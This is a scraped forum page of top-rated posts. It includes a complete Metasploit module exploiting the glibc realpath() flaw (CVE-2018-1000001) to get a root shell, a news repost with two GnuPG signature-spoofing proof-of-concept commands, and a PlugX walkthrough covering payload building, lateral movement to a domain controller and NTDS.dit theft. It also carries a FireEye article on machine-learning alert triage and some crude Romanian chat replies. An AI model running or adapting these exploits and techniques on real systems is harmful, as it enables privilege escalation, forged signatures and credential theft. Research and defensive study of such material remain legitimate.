Leaderboard
Popular Content
Showing content with the highest reputation on 06/15/18 in all areas
-
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Post::Linux::Kernel include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => "glibc 'realpath()' Privilege Escalation", 'Description' => %q{ This module attempts to gain root privileges on Linux systems by abusing a vulnerability in GNU C Library (glibc) version 2.26 and prior. This module uses halfdog's RationalLove exploit to exploit a buffer underflow in glibc realpath() and create a SUID root shell. The exploit has offsets for glibc versions 2.23-0ubuntu9 and 2.24-11+deb9u1. The target system must have unprivileged user namespaces enabled. This module has been tested successfully on Ubuntu Linux 16.04.3 (x86_64) with glibc version 2.23-0ubuntu9; and Debian 9.0 (x86_64) with glibc version 2.24-11+deb9u1. }, 'License' => MSF_LICENSE, 'Author' => [ 'halfdog', # Discovery and RationalLove.c exploit 'Brendan Coles' # Metasploit ], 'DisclosureDate' => 'Jan 16 2018', 'Platform' => [ 'linux' ], 'Arch' => [ ARCH_X86, ARCH_X64 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [[ 'Auto', {} ]], 'Privileged' => true, 'References' => [ [ 'AKA', 'RationalLove.c' ], [ 'BID', '102525' ], [ 'CVE', '2018-1000001' ], [ 'EDB', '43775' ], [ 'URL', 'https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/' ], [ 'URL', 'http://www.openwall.com/lists/oss-security/2018/01/11/5' ], [ 'URL', 'https://securitytracker.com/id/1040162' ], [ 'URL', 'https://sourceware.org/bugzilla/show_bug.cgi?id=22679' ], [ 'URL', 'https://usn.ubuntu.com/3534-1/' ], [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1533836' ] ], 'DefaultTarget' => 0)) register_options [ OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]), OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]), ] end def base_dir datastore['WritableDir'].to_s end def upload(path, data) print_status "Writing '#{path}' (#{data.size} bytes) ..." write_file path, data register_file_for_cleanup path end def upload_and_chmodx(path, data) upload path, data cmd_exec "chmod +x '#{path}'" end def upload_and_compile(path, data) upload "#{path}.c", data gcc_cmd = "gcc -w -o #{path} #{path}.c" if session.type.eql? 'shell' gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}" end output = cmd_exec gcc_cmd unless output.blank? print_error output fail_with Failure::Unknown, "#{path}.c failed to compile" end register_file_for_cleanup path cmd_exec "chmod +x #{path}" end def exploit_data(file) path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2018-1000001', file fd = ::File.open path, 'rb' data = fd.read fd.stat.size fd.close data end def live_compile? return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True') if has_gcc? vprint_good 'gcc is installed' return true end unless datastore['COMPILE'].eql? 'Auto' fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.' end end def check version = kernel_release if Gem::Version.new(version.split('-').first) < Gem::Version.new('2.6.36') vprint_error "Linux kernel version #{version} is not vulnerable" return CheckCode::Safe end vprint_good "Linux kernel version #{version} is vulnerable" arch = kernel_hardware unless arch.include? 'x86_64' vprint_error "System architecture #{arch} is not supported" return CheckCode::Safe end vprint_good "System architecture #{arch} is supported" unless userns_enabled? vprint_error 'Unprivileged user namespaces are not permitted' return CheckCode::Safe end vprint_good 'Unprivileged user namespaces are permitted' version = glibc_version if Gem::Version.new(version.split('-').first) > Gem::Version.new('2.26') vprint_error "GNU C Library version #{version} is not vulnerable" return CheckCode::Safe end vprint_good "GNU C Library version #{version} is vulnerable" # fuzzy match glibc 2.23-0ubuntu9 and 2.24-11+deb9u1 glibc_banner = cmd_exec('ldd --version') unless glibc_banner.include?('2.23-0ubuntu') || glibc_banner.include?('2.24-11+deb9') vprint_error 'No offsets for this version of GNU C Library' return CheckCode::Safe end CheckCode::Appears end def exploit if is_root? fail_with Failure::BadConfig, 'Session already has root privileges' end if check != CheckCode::Appears fail_with Failure::NotVulnerable, 'Target is not vulnerable' end unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true' fail_with Failure::BadConfig, "#{base_dir} is not writable" end # Upload exploit executable executable_name = ".#{rand_text_alphanumeric rand(5..10)}" @executable_path = "#{base_dir}/#{executable_name}" if live_compile? vprint_status 'Live compiling exploit on system...' upload_and_compile @executable_path, exploit_data('RationalLove.c') else vprint_status 'Dropping pre-compiled exploit on system...' upload_and_chmodx @executable_path, exploit_data('RationalLove') end # Upload payload executable payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}" upload_and_chmodx payload_path, generate_payload_exe # Launch exploit print_status 'Launching exploit...' output = cmd_exec "echo '#{payload_path} & exit' | #{@executable_path}", nil, 30 output.each_line { |line| vprint_status line.chomp } end def on_new_session(client) # remove root owned SUID executable if client.type.eql? 'meterpreter' client.core.use 'stdapi' unless client.ext.aliases.include? 'stdapi' client.fs.file.rm @executable_path else client.shell_command_token "rm #{@executable_path}" end end end Source1 point
-
SigSpoof flaw fixed inGnuPG, Enigmail, GPGTools, and python-gnupg. For their entire existence, some of the world's most widely used email encryption tools have been vulnerable to hacks that allowed attackers to spoof the digital signature of just about any person with a public key, a researcher said Wednesday. GnuPG, Enigmail, GPGTools, and python-gnupg have all been updated to patch the critical vulnerability. Enigmail and the Simple Password Store have also received patches for two related spoofing bugs. Digital signatures are used to prove the source of an encrypted message, data backup, or software update. Typically, the source must use a private encryption key to cause an application to show that a message or file is signed. But a series of vulnerabilities dubbed SigSpoof makes it possible in certain cases for attackers to fake signatures with nothing more than someone’s public key or key ID, both of which are often published online. The spoofed email shown at the top of this post can't be detected as malicious without doing forensic analysis that's beyond the ability of many users. Backups and software updates affected, too The flaw, indexed as CVE-2018-12020, means that decades' worth of email messages many people relied on for sensitive business or security matters may have in fact been spoofs. It also has the potential to affect uses that went well beyond encrypted email. CVE-2018-12020 affects vulnerable software only when it enables a setting called verbose, which is used to troubleshoot bugs or unexpected behavior. None of the vulnerable programs enables verbose by default, but a variety of highly recommended configurations available online—including the cooperpair safe defaults, Ultimate GPG settings, and Ben's IT-Kommentare—turn it on. Once verbose is enabled, Brinkmann's post includes three separate proof-of-concept spoofing attacks that work against the previously mentioned tools and possibly many others. The spoofing works by hiding metadata in an encrypted email or other message in a way that causes applications to treat it as if it were the result of a signature-verification operation. Applications such as Enigmail and GPGTools then cause email clients such as Thunderbird or Apple Mail to falsely show that an email was cryptographically signed by someone chosen by the attacker. All that's required to spoof a signature is to have a public key or key ID. The attacks are relatively easy to carry out. The code for one of Brinkmann’s PoC exploits that forges the digital signature of Enigmail developer Patrick Brunschwig is: $ echo 'Please send me one of those expensive washing machines.' \ | gpg --armor -r VICTIM_KEYID --encrypt --set-filename "`echo -ne \''\ \n[GNUPG:] GOODSIG DB1187B9DD5F693B Patrick Brunschwig \ \n[GNUPG:] VALIDSIG 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B 2018-05-31 1527721037 0 4 0 1 10 01 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B\ \n[GNUPG:] TRUST_FULLY 0 classic\ \ngpg: '\'`" > poc1.msg A second exploit is: echo "See you at the secret spot tomorrow 10am." | gpg --armor --store --compress-level 0 --set-filename "`echo -ne \''\ \n[GNUPG:] GOODSIG F2AD85AC1E42B368 Patrick Brunschwig \ \n[GNUPG:] VALIDSIG F2AD85AC1E42B368 x 1527721037 0 4 0 1 10 01\ \n[GNUPG:] TRUST_FULLY\ \n[GNUPG:] BEGIN_DECRYPTION\ \n[GNUPG:] DECRYPTION_OKAY\ \n[GNUPG:] ENC_TO 50749F1E1C02AB32 1 0\ \ngpg: '\'`" > poc2.msg Brinkmann told Ars that the root cause of the bug goes back to GnuPG 0.2.2 from 1998, "although the impact would have been different then and changed over time as more apps use GPG." He publicly disclosed the vulnerability only after developers of the tools known to be vulnerable were patched. The flaws are patched in GnuPG version 2.2.8, Enigmail 2.0.7, GPGTools 2018.3, and python GnuPG 0.4.3. People who want to know the status of other applications that use OpenPGP should check with the developers. Wednesday's vulnerability disclosure comes a month after researchers revealed a different set of flaws that made it possible for attackers to decrypt previously obtained emails that were encrypted using PGP or S/MIME. Efail, as the bugs were dubbed, could be exploited in a variety of email programs, including Thunderbird, Apple Mail, and Outlook. Separately, Brinkmann reported two SigSpoof-related vulnerabilities in Enigmail and the Simple Password Store that also made it possible to spoof digital signatures in some cases. CVE-2018-12019 affecting Enigmail can be triggered even when the verbose setting isn't enabled. It, too, is patched in the just-released version 2.0.7. CVE-2018-12356, meanwhile, let remote attackers spoof file signatures on configuration files and extensions scripts, potentially allowing the accessing of passwords or the execution of malicious code. The fix is here. Via arstechnica.com1 point
-
Part 1: Following my previous article on PlugX, I would like to continue the analysis but now use the PlugX controller to mimic some of the steps that might be executed by an attacker. As you know the traditional steps of an attack lifecycle follow, normally, a predictable sequence of events i.e., Reconnaissance, initial compromise, establish foothold, escalate privileges, internal reconnaissance, move laterally, maintain persistence, complete mission. For sake of brevity I will skip most of the steps and will focus on the lateral movement.I will use the PlugX controller and C2 functionality to simulate an attacker that established a foothold inside an environment and obtained admin access to a workstation. Following that, the attacker moved laterally to a Windows Domain Controller. I will use the PlugX controller to accomplish this scenario and observe how an attacker would operate within a compromised environment. As we saw previously, the PlugX controller interface allows an operator to build payloads, set campaigns and define the preferred method for the compromised hosts to check-in and communicate with the controller. In the PlugX controller, English version from Q3 2013, an operator can build the payload using two techniques. One is using the “DNS Online” technique which allows the operator to define the C2 address e.g, an URL or IP address, that will be used by the payload to speak with the C2. The other method, is the “Web Online”, which allows the operator to tell the payload from where it should fetch the C2 address. This method allows the operator to have more control over the campaign. The following diagram illustrates how the “Web Online” technique works. Why do I say this technique would allow an attacker to have more control? Consider the case that an organization was compromised by a threat actor that use this PlugX technique. In case the C2 is discovered, the impacted organization could block the IP or URL on the existing boundary security controls as a normal reaction to the concerns of having an attacker inside the network. However, the attacker could just change the C2 string and point it to a different system. In case the organization was not able to scope the incident and understand the TTP’s (Tools, Tactics and Procedures) then the attacker would still maintain persistence in the environment. This is an example that when conducting incident response, among other things, you need to have visibility into the tools and techniques the attacker is using so you could properly scope the incident and perform effective and efficient containment and eradication steps. As an example of this technique, below is a print screen from a GitHub page that has been used by an unknown threat actor to leverage this method. So, how to leverage this technique on the PlugX builder? The picture below shows how the operator could create a payload that uses the “Web Online” technique. The C2 address would be fetched from a specified site e.g. a Pastebin address, which on its turn would redirect the payload to the real C2 address. The string “DZKSAFAAHHHHHHOCCGFHJGMGEGFGCHOCDGPGNGDZJS” in this case is used to decode to the real C2 address which is “www.builder.com”. On the “PlugX: some uncovered points” article, Fabien Perigaud writes about how to decode this string. Palo Alto Unit42 gives another example of this technique on the “Paranoid PlugX” article. The article “Winnti Abuses GitHub for C&C Communications” from Cedric Pernet ilustrates an APT group leveraging this technique using GitHub. For sake of simplicity, in this article, I’m going to use the DNS Online technique using “www.builder.com” as C2 address. Next, on the “First” tab I specify the campaing ID and the password used by the payload to connect to the C2. Next, on the Install tab I specify the persistence settings, in this case I’m telling the payload to install a service and I can specify different settings including where to deploy the binaries, the service name and service description. In addition, I can specify that if the Service persistence mechanism fails due to some reason the payload should install the persistence mechanism using the Registry and I can specify which HIVE should be used. Then, In the inject tab I specify which process will be injected with the malicious payload. In this case I choose “svchost.exe”. This will make PlugX start a new instance of “svchost.exe” and then inject the malicious code into svchost.exe process address space using process hollowing technique. Other than that, the operator could define a schedule and determine which time of the week the payload should communicate with the C2. Also the operator could define the Screen Recording capability that will take screenshots at a specific frequency and will save them encrypted in a specific folder. Last settings on the “option” tab allow the operator to enable the keylogger functionality and specify if the payload should hide it self and also delete itself after execution. Finally, after all the settings defined, the operator can create/download the payload in different formats. An executable, binary form (Shellcode), or an array in C that can then be plugged in another delivery mechanism e.g, PowerShell or MsBuild. After deploying and installing the payload on a system, that system will check-in into the PlugX controller and an operator can call the “Manager” to perform the different actions. In this example I show how an attacker, after having compromised a system, uses the C2 interface to: Browse the network Access remote systems via UNC path Upload and execute a file e.g., upload PlugX binary Invoke a command shell and perform remote commands e.g., execute PlugX binary on a remote system Previous pictures illustrate actions that the attacker could perform to move laterally and, for example, at some point in time, access a domain controller via UNC path, upload the PlugX payload to a directory of its choice and execute it. In this case the pictures show that the PlugX payload was dropped into c:\PerfLogs\Admin folder and then was executed using WMI. Below example shows the view from the attacker with two C2 sessions. One for one workstation and another for a domain controller. Having access to a domain controller is likely one of the goals of the attacker so he can obtain all the information he needs about an organization from the Active Directory database. To access the Active Directory database, the attacker could, for example, run the “ntdsutil.exe” command to create a copy of the “NTDS.dit” file using Volume Shadow Copy technique. Then, the attacker can access the database and download it to a system under his control using the PlugX controller interface. The picture below illustrates an attacker obtained the relevant data that was produced using the “ntdsutil.exe” command. Finally, the attacker might delete the artifacts that were left behind on the file system as consequence of running “ntdsutil.exe”. So, in summary, we briefly looked at the different techniques a PlugX payload could be configured to speak with a Command and Controller. We built, deploy and install a payload. Compromised a system and obtain a perspective from PlugX operator. We move laterally to a domain controller and installed the PlugX payload and then used a command shell to obtain the Active Directory database. Of course, as you noted, the scenario was accomplished with an old version of the PlugX controller. Newer versions likely have many new features and capabilities. For example, the print screen below is from a PlugX builder from 2014 (MD5: 534d28ad55831c04f4a7a8ace6dd76c3) which can create different payloads that perform DLL Search order hijacking using Lenovo’s RGB LCD Display Utility for ThinkPad (tplcdclr.exe) or Steve Gibson’s Domain Name System Benchmarking Utility (sep_NE.exe). The article from Kaspersky “PlugX malware: A good hacker is an apologetic hacker” outlines a summary about it. That’s it! With this article we set the table for the next article focusing on artifacts that might helps us uncover the hidden traits that were left behind by the attacker actions performed during this scenario. Stay tuned and have fun! Source: countuponsecurity.com1 point
-
I followed the truth to the depths of darkness only to find the masters of the darkness moved to be the masters of the light. <31 point
-
Many cyber incidents can be traced back to an original alert that was either missed or ignored by the Security Operations Center (SOC) or Incident Response (IR) team. While most analysts and SOCs are vigilant and responsive, the fact is they are often overwhelmed with alerts. If a SOC is unable to review all the alerts it generates, then sooner or later, something important will slip through the cracks. The core issue here is scalability. It is far easier to create more alerts than to create more analysts, and the cyber security industry is far better at alert generation than resolution. More intel feeds, more tools, and more visibility all add to the flood of alerts. There are things that SOCs can and should do to manage this flood, such as increasing automation of forensic tasks (pulling PCAP and acquiring files, for example) and using aggregation filters to group alerts into similar batches. These are effective strategies and will help reduce the number of required actions a SOC analyst must take. However, the decisions the SOC makes still form a critical bottleneck. This is the “Analyze/ Decide” block in Figure 1. Figure 1: Basic SOC triage stages In this blog post, we propose machine learning based strategies to help mitigate this bottleneck and take back control of the SOC. We have implemented these strategies in our FireEye Managed Defense SOC, and our analysts are taking advantage of this approach within their alert triaging workflow. In the following sections, we will describe our process to collect data, capture alert analysis, create a model, and build an efficacy workflow – all with the ultimate goal of automating alert triage and freeing up analyst time. Reverse Engineering the Analyst Every alert that comes into a SOC environment contains certain bits of information that an analyst uses to determine if the alert represents malicious activity. Often, there are well-paved analytical processes and pathways used when evaluating these forensic artifacts over time. We wanted to explore if, in an effort to truly scale our SOC operations, we could extract these analytical pathways, train a machine to traverse them, and potentially discover new ones. Think of a SOC as a self-contained machine that inputs unlabeled alerts and outputs the alerts labeled as “malicious” or “benign”. How can we capture the analysis and determine that something is indeed malicious, and then recreate that analysis at scale? In other words, what if we could train a machine to make the same analytical decisions as an analyst, within an acceptable level of confidence? Basic Supervised Model Process The data science term for this is a “Supervised Classification Model”. It is “supervised” in the sense that it learns by being shown data already labeled as benign or malicious, and it is a “classification model” in the sense that once it has been trained, we want it to look at a new piece of data and make a decision between one of several discrete outcomes. In our case, we only want it to decide between two “classes” of alerts: malicious and benign. In order to begin creating such a model, a dataset must be collected. This dataset forms the “experience” of the model, and is the information we will use to “train” the model to make decisions. In order to supervise the model, each unit of data must be labeled as either malicious or benign, so that the model can evaluate each observation and begin to figure out what makes something malicious versus what makes it benign. Typically, collecting a clean, labeled dataset is one of the hardest parts of the supervised model pipeline; however, in the case of our SOC, our analysts are constantly triaging (or “labeling”) thousands of alerts every week, and so we were lucky to have an abundance of clean, standardized, labeled alerts. Once a labeled dataset has been defined, the next step is to define “features” that can be used to portray the information resident in each alert. A “feature” can be thought of as an aspect of a bit of information. For example, if the information is represented as a string, a natural “feature” could be the length of the string. The central idea behind building features for our alert classification model was to find a way to represent and record all the aspects that an analyst might consider when making a decision. Building the model then requires choosing a model structure to use, and training the model on a subset of the total data available. The larger and more diverse the training data set, generally the better the model will perform. The remaining data is used as a “test set” to see if the trained model is indeed effective. Holding out this test set ensures the model is evaluated on samples it has never seen before, but for which the true labels are known. Finally, it is critical to ensure there is a way to evaluate the efficacy of the model over time, as well as to investigate mistakes so that appropriate adjustments can be made. Without a plan and a pipeline to evaluate and retrain, the model will almost certainly decay in performance. Feature Engineering Before creating any of our own models, we interviewed experienced analysts and documented the information they typically evaluate before making a decision on an alert. Those interviews formed the basis of our feature extraction. For example, when an analyst says that reviewing an alert is “easy”, we ask: “Why? And what helps you make that decision?” It is this reverse engineering of sorts that gives insight into features and models we can use to capture analysis. For example, consider a process execution event. An alert on a potentially malicious process execution may contain the following fields: Process Path Process MD5 Parent Process Process Command Arguments While this may initially seem like a limited feature space, there is a lot of useful information that one can extract from these fields. Beginning with the process path of, say, “C:\windows\temp\m.exe”, an analyst can immediately see some features: The process resides in a temporary folder: C:\windows\temp\ The process is two directories deep in the file system The process executable name is one character long The process has an .exe extension The process is not a “common” process name While these may seem simple, over a vast amount of data and examples, extracting these bits of information will help the model to differentiate between events. Even the most basic aspects of an artifact must be captured in order to “teach” the model to view processes the way an analyst does. The features are then encoded into a more discrete representation, similar to this: Temp_folder Depth Name_Length Extension common_process_name TRUE 2 1 exe FALSE Another important feature to consider about a process execution event is the combination of parent process and child process. Deviation from expected “lineage” can be a strong indicator of malicious activity. Say the parent process of the aforementioned example was ‘powershell.exe’. Potential new features could then be derived from the concatenation of the parent process and the process itself: ‘powershell.exe_m.exe’. This functionally serves as an identity for the parent-child relation and captures another key analysis artifact. The richest field, however, is probably the process arguments. Process arguments are their own sort of language, and language analysis is a well-tread space in predictive analytics. We can look for things including, but not limited to: Network connection strings (such as ‘http://’, ‘https://’, ‘ftp://’). Base64 encoded commands Reference to Registry Keys (‘HKLM’, ‘HKCU’) Evidence of obfuscation (ticks, $, semicolons) (read Daniel Bohannon’s work for more) The way these features and their values appear in a training dataset will define the way the model learns. Based on the distribution of features across thousands of alerts, relationships will start to emerge between features and labels. These relationships will then be recorded in our model, and ultimately used to influence the predictions for new alerts. Looking at distributions of features in the training set can give insight into some of these potential relationships. For example, Figure 2 shows how the distribution of Process Command Length may appear when grouping by malicious (red) and benign (blue). Figure 2: Distribution of Process Event alerts grouped by Process Command Length This graph shows that over a subset of samples, the longer the command length, the more likely it is to be malicious. This manifests as red on the right and blue on the left. However, process length is not the only factor. As part of our feature set, we also thought it would be useful to approximate the “complexity” of each command. For this, we used “Shannon entropy”, a commonly used metric that measures the degree of randomness present in a string of characters. Figure 3 shows a distribution of command entropy, broken out into malicious and benign. While the classes do not separate entirely, we can see that for this sample of data, samples with higher entropy generally have a higher chance of being malicious. Figure 3: Distribution of Process Event alerts grouped by entropy Model Selection and Generalization Once features have been generated for the whole dataset, it is time to use them to train a model. There is no perfect procedure for picking the best model, but looking at the type of features in our data can help narrow it down. In the case of a process event, we have a combination of features represented as strings and numbers. When an analyst evaluates each artifact, they ask questions about each of these features, and combine the answers to estimate the probability that the process is malicious. For our use case, it also made sense to prioritize an ‘interpretable’ model – that is, one that can more easily expose why it made a certain decision about an artifact. This way analysts can build confidence in the model, as well as detect and fix analytical mistakes that the model is making. Given the nature of the data, the decisions analysts make, and the desire for interpretability, we felt that a decision tree-based model would be well-suited for alert classification. There are many publicly available resources to learn about decision trees, but the basic intuition behind a decision tree is that it is an iterative process, asking a series of questions to try to arrive at a highly confident answer. Anyone who has played the game “Twenty Questions” is familiar with this concept. Initially, general questions are asked to help eliminate possibilities, and then more specific questions are asked to narrow down the possibilities. After enough questions are asked and answered, the ‘questioner’ feels they have a high probability of guessing the right answer. Figure 4 shows an example of a decision tree that one might use to evaluate process executions. Figure 4: Decision tree for deciding whether an alert is benign or malicious For the example alert in the diagram, the “decision path” is marked in red. This is how this decision tree model makes a prediction. It first asks: “Is the length greater than 100 characters?” If so, it moves to the next question “Does it contain the string ‘http’?” and so on until it feels confident in making an educated guess. In the example in Figure 4, given that 95 percent of all the training alerts traveling this decision path were malicious, the model predicts a 95 percent chance that this alert will also be malicious. Because they can ask such detailed combinations of questions, it is possible that decision trees can “overfit”, or learn rules that are too closely tied to the training set. This reduces the model’s ability to “generalize” to new data. One way to mitigate this effect is to use many slightly different decision trees and have them each “vote” on the outcome. This “ensemble” of decision trees is called a Random Forest, and it can improve performance for the model when deployed in the wild. This is the algorithm we ultimately chose for our model. How the SOC Alert Model Works When a new alert appears, the data in the artifact is transformed into a vector of the encoded features, with the same structure as the feature representations used to train the model. The model then evaluates this “feature vector” and applies a confidence level for the predicted label. Based on thresholds we set, we can then classify the alert as malicious or benign. Figure 5: An alert presented to the analyst with its raw values captured As an example, the event shown in Figure 5 might create the following feature values: Parent Process: ‘wscript’ Command Entropy: 5.08 Command Length =103 Based on how they were trained, the trees in the model each ask a series of questions of the new feature vector. As the feature vector traverses each tree, it eventually converges on a terminal “leaf” classifying it as either benign or malicious. We can then evaluate the aggregated decisions made by each tree to estimate which features in the vector played the largest role in the ultimate classification. For the analysts in the SOC, we then present the features extracted from the model, showing the distribution of those features over the entire dataset. This gives the analysts insight into “why” the model thought what it thought, and how those features are represented across all alerts we have seen. For example, the “explanation” for this alert might look like: Command Entropy = 5.08 > 4.60: 51.73% Threat occuranceOfChar “\”= 9.00 > 4.50: 64.09% Threat occuranceOfChar:“)” (=0.00) <= 0.50: 78.69% Threat NOT processTree=”cmd.exe_to_cscript.exe”: 99.6% Threat Thus, at the time of analysis, the analysts can see the raw data of the event, the prediction from the model, an approximation of the decision path, and a simplified, interpretable view of the overall feature importance. How the SOC Uses the Model Showing the features the model used to reach the conclusion allows experienced analysts to compare their approach with the model, and give feedback if the model is doing something wrong. Conversely, a new analyst may learn to look at features they may have otherwise missed: the parent-child relationship, signs of obfuscation, or network connection strings in the arguments. After all, the model has learned on the collective experience of every analyst over thousands of alerts. Therefore, the model provides an actionable reflection of the aggregate analyst experience back to the SOC, so that each analyst can transitively learn from their colleagues. Additionally, it is possible to write rules using the output of the model as a parameter. If the model is particularly confident on a subset of alerts, and the SOC feels comfortable automatically classifying that family of threats, it is possible to simply write a rule to say: “If the alert is of this type, AND for this malware family, AND the model confidence is above 99, automatically call this alert bad and generate a report.” Or, if there is a storm of probable false positives, one could write a rule to cull the herd of false positives using a model score below 10. How the Model Stays Effective The day the model is trained, it stops learning. However, threats – and therefore alerts – are constantly evolving. Thus, it is imperative to continually retrain the model with new alert data to ensure it continues to learn from changes in the environment. Additionally, it is critical to monitor the overall efficacy of the model over time. Building an efficacy analysis pipeline to compare model results against analyst feedback will help identify if the model is beginning to drift or develop structural biases. Evaluating and incorporating analyst feedback is also critical to identify and address specific misclassifications, and discover potential new features that may be necessary. To accomplish these goals, we run a background job that updates our training database with newly labeled events. As we get more and more alerts, we periodically retrain our model with the new observations. If we encounter issues with accuracy, we diagnose and work to address them. Once we are satisfied with the overall accuracy score of our retrained model, we store the model object and begin using that model version. We also provide a feedback mechanism for analysts to record when the model is wrong. An analyst can look at the label provided by the model and the explanation, but can also make their own decision. Whether they agree with the model or not, they can input their own label through the interface. We store this label provided by the analyst along with any optional explanation given by them regarding the explanation. Finally, it should be noted that these manual labels may require further evaluation. As an example, consider a commodity malware alert, in which network command and control communications were sinkholed. An analyst may evaluate the alert, pull back triage details, including PCAP samples, and see that while the malware executed, the true threat to the environment was mitigated. Since it does not represent an exigent threat, the analyst may mark this alert as ‘benign’. However, the fact that it was sinkholed does not change that the artifacts of execution still represent malicious activity. Under different circumstances, this infection could have had a negative impact on the organization. However, if the benign label is used when retraining the model, that will teach the model that something inherently malicious is in fact benign, and potentially lead to false negatives in the future. Monitoring efficacy over time, updating and retraining the model with new alerts, and evaluating manual analyst feedback gives us visibility into how the model is performing and learning over time. Ultimately this helps to build confidence in the model, so we can automate more tasks and free up analyst time to perform tasks such as hunting and investigation. Conclusion A supervised learning model is not a replacement for an experienced analyst. However, incorporating predictive analytics and machine learning into the SOC workflow can help augment the productivity of analysts, free up time, and ensure they utilize investigative skills and creativity on the threats that truly require expertise. This blog post outlines the major components and considerations of building an alert classification model for the SOC. Data collection, labeling, feature generation, model training, and efficacy analysis must all be carefully considered when building such a model. FireEye continues to iterate on this research to improve our detection and response capabilities, continually improve the detection efficacy of our products, and ultimately protect our clients. The process and examples shown discussed in this post are not mere research. Within our FireEye Managed Defense SOC, we use alert classification models built using the aforementioned processes to increase our efficiency and ensure we apply our analysts’ expertise where it is needed most. In a world of ever increasing threats and alerts, increasing SOC efficiency may mean the difference between missing and catching a critical intrusion. Source1 point
-
Nu pierde timpul in fata calculatorului la varsta ta, apuca-te de un sport care plătește bine, gen fotbal, tenis sau box. Ai timp si mai tarziu in viata sa inveti programare1 point
-
1 point
-
1 point
-
1 point
-
1 point
-
Exista masini CNC cu 50 de ani inainte de a face martalogii astia marketing cu imprimanta 3D. Prelucrezi si titan, nu doar plastic. Uite: -1 point
-
sa-mi saracesti coaiele, eu m-am apucat la 9 ani si deja la 15 ani eu stiam destul de ok (zic eu) programare. nu mai zi tu pe pula mea, te rezumi intr-un mod subiectiv la tine.1 point
-
1 point
-
1 point
-
https://gist.github.com/dylanmckay/2b191a10068bd87d0fffba242db44b521 point